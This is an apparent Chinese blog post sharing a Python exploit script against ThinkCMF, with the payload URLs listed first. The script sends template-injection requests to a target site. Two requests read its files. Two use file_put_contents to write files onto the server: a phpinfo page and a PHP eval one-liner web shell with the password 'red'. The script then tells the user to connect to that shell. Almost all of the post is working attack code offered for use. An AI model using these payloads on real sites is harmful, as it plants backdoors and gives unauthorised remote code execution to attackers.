这是一个简单的thinkcmfexp,实际上代码只用了requests库就完成了,但是为了使用体验还用了argparse库编写用户友好的命令行接口。下面来说说脚本探测的几个payload,以及用法。

探测以下4个payload:

1
2
3
4
?a=display&templateFile=README.md
?a=display&templateFile=config.yaml
?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo();?>')</php>
?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('red.php','by:zjun <?php eval($_POST["red"]);?>')</php>

前两个主要判断是否存在网站文件读取漏洞,后两个是文件写入,分别测试写入phpinfophp一句话

代码使用python3实现,内容极其简单,代码勿喷。

目前只写了单个url的检测,没打算写批量,主要用法有-u/--url-h/--help

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
# Author: zjun
# Github: https://github.com/z1un
# Date: 2020-02-10

import requests
import argparse
from requests.exceptions import RequestException

headers = {
	'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36'
}

def payload_01(url):
	try:
		response = requests.get((url+'?a=display&templateFile=README.md'), headers = headers, timeout = 5)
		if '## README' in response.text:
			print ('[+]存在readme.md: {}?a=display&templateFile=README.md'.format(url))
			return 0
		return 1
	except RequestException:
		return 2

def payload_02(url):
	try:
		response = requests.get((url+'?a=display&templateFile=config.yaml'), headers = headers, timeout = 5)
		if 'name: thinkcmf' in response.text:
			print('[+]存在config.yaml: {}?a=display&templateFile=config.yaml'.format(url))
			return 0
		return 1
	except RequestException:
		return 2

def payload_03(url):
	try:
		response = requests.get((url+"?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo();?>')</php>"), headers = headers, timeout = 5)
		if response.status_code == 200:
			response = requests.get((url+'/test.php'), headers = headers, timeout = 5)
			if response.status_code == 200:
				if 'http://www.php.net' in response.text:
					print('[+]phpinfo: {}/test.php'.format(url))
					return 0
				return 1
			return 1
		return 1
	except RequestException:
		return 2

def payload_04(url):
	try:
		response = requests.get((url+'''?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('red.php','by:zjun <?php eval($_POST["red"]);?>')</php>'''), headers = headers,allow_redirects=False, timeout = 5)
		if response.status_code == 200:
			response = requests.get((url+'/red.php'), headers = headers,allow_redirects=False, timeout = 5)
			if 'by:zjun' in response.text:
				print('[+]请连接shell,密码是red: {}/red.php'.format(url))
				return 0
			return 1
		return 1
	except RequestException:
		return 2

if __name__ == '__main__':
	print(r'''
 _   _     _       _                   __
| |_| |__ (_)_ __ | | _____ _ __ ___  / _|       _____  ___ __
| __| '_ \| | '_ \| |/ / __| '_ ` _ \| |_ _____ / _ \ \/ / '_ \
| |_| | | | | | | |   < (__| | | | | |  _|_____|  __/>  <| |_) |
 \__|_| |_|_|_| |_|_|\_\___|_| |_| |_|_|        \___/_/\_\ .__/
                                                         |_|
                                         -by:zjun
                                        www.zjun.info
该脚本具有一定误差,请谨慎使用,仅供参考!
		''')
	parser = argparse.ArgumentParser(description='The exp of thinkcmf')
	parser.add_argument('-u', '--url',required=True,help='target url')
	args = parser.parse_args()
	url = args.url
	payload_01 = payload_01(url)
	payload_02 = payload_02(url)
	payload_03 = payload_03(url)
	payload_04 = payload_04(url)
	if payload_01 and payload_02 and payload_03 and payload_04 == 2:
		print('[-]连接超时:{}'.format(url))
	elif payload_01 and payload_02 and payload_03 and payload_04 == 1:
		print('[-]初步测试暂不存在thinkcmf漏洞: {}'.format(url))
	else:
		print('^ _ ^ enjoy it!')

项目地址